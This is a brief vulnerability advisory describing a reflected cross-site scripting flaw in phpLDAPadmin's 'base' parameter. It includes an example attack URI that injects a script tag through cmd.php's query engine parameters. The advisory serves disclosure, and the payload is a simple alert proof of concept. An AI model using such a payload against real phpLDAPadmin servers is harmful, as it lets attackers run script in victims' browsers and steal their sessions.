phpLDAPadmin 'base' Parameter Cross Site Scripting Vulnerability

phpLDAPadmin 'base' Parameter Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search